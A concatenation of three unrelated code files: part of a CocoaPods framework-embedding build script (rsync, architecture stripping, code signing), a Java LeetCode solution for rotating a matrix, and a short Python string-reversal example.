echo "Symlinked..."
source="$(readlink "${source}")"
fi
# use filter instead of exclude so missing patterns dont' throw errors
echo "rsync -av --filter \"- CVS/\" --filter \"- .svn/\" --filter \"- .git/\" --filter \"- .hg/\" --filter \"- Headers\" --filter \"- PrivateHeaders\" --filter \"- Modules\" \"${source}\" \"${destination}\""
rsync -av --filter "- CVS/" --filter "- .svn/" --filter "- .git/" --filter "- .hg/" --filter "- Headers" --filter "- PrivateHeaders" --filter "- Modules" "${source}" "${destination}"
local basename
basename="$(basename -s .framework "$1")"
binary="${destination}/${basename}.framework/${basename}"
if ! [ -r "$binary" ]; then
binary="${destination}/${basename}"
fi
# Strip invalid architectures so "fat" simulator / device frameworks work on device
if [[ "$(file "$binary")" == *"dynamically linked shared library"* ]]; then
strip_invalid_archs "$binary"
fi
# Resign the code if required by the build settings to avoid unstable apps
code_sign_if_enabled "${destination}/$(basename "$1")"
# Embed linked Swift runtime libraries. No longer necessary as of Xcode 7.
if [ "${XCODE_VERSION_MAJOR}" -lt 7 ]; then
local swift_runtime_libs
swift_runtime_libs=$(xcrun otool -LX "$binary" | grep --color=never @rpath/libswift | sed -E s/@rpath\\/\(.+dylib\).*/\\1/g | uniq -u && exit ${PIPESTATUS[0]})
for lib in $swift_runtime_libs; do
echo "rsync -auv \"${SWIFT_STDLIB_PATH}/${lib}\" \"${destination}\""
rsync -auv "${SWIFT_STDLIB_PATH}/${lib}" "${destination}"
code_sign_if_enabled "${destination}/${lib}"
done
fi
}
# Signs a framework with the provided identity
code_sign_if_enabled() {
if [ -n "${EXPANDED_CODE_SIGN_IDENTITY}" -a "${CODE_SIGNING_REQUIRED}" != "NO" -a "${CODE_SIGNING_ALLOWED}" != "NO" ]; then
# Use the current code_sign_identitiy
echo "Code Signing $1 with Identity ${EXPANDED_CODE_SIGN_IDENTITY_NAME}"
echo "/usr/bin/codesign --force --sign ${EXPANDED_CODE_SIGN_IDENTITY} --preserve-metadata=identifier,entitlements \"$1\""
/usr/bin/codesign --force --sign ${EXPANDED_CODE_SIGN_IDENTITY} --preserve-metadata=identifier,entitlements "$1"
fi
}
# Strip invalid architectures
strip_invalid_archs() {
binary="$1"
# Get architectures for current file
archs="$(lipo -info "$binary" | rev | cut -d ':' -f1 | rev)"
stripped=""
for arch in $archs; do
if ! [[ "${VALID_ARCHS}" == *"$arch"* ]]; then
# Strip non-valid architectures in-place
lipo -remove "$arch" -output "$binary" "$binary" || exit 1
stripped="$stripped $arch"
fi
done
if [[ "$stripped" ]]; then
echo "Stripped $binary of architectures:$stripped"
fi
}
if [[ "$CONFIGURATION" == "Debug" ]]; then
install_framework "Pods-RadialActivityIndicatorTest/RadialActivityIndicator.framework"
fi
if [[ "$CONFIGURATION" == "Release" ]]; then
install_framework "Pods-RadialActivityIndicatorTest/RadialActivityIndicator.framework"
fi
|
package com.github.chen0040.leetcode.day03.medium;
/**
* Created by xschen on 30/7/2017.
*
* summary:
* You are given an n x n 2D matrix representing an image.
* Rotate the image by 90 degrees (clockwise).
*
* link: https://leetcode.com/problems/rotate-image/description/
*/
public class RotateImage {
public class Solution {
public void rotate(int[][] matrix) {
int n = matrix.length;
int offset1 = 0;
int offset2 = n-1;
int mid = n / 2;
for(int k=0; k < mid; ++k) {
for(int l = offset1; l < offset2; ++l) {
int top = matrix[offset1][l];
int right = matrix[l][offset2];
int bottom = matrix[offset2][offset2 - l + offset1];
int left = matrix[offset2 - l + offset1][offset1];
matrix[offset1][l] = left; // left -> top
matrix[l][offset2] = top; // top -> right
matrix[offset2][offset2 - l + offset1] = right; // right -> bottom
matrix[offset2 - l + offset1][offset1] = bottom;// bottom -> left;
}
offset1++;
offset2--;
}
}
}
}
|
def reverse_string(s):
return s[::-1]
# Driver function
s = "Hello World!"
print ("The reversed string is : ",end="")
print (reverse_string(s)) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.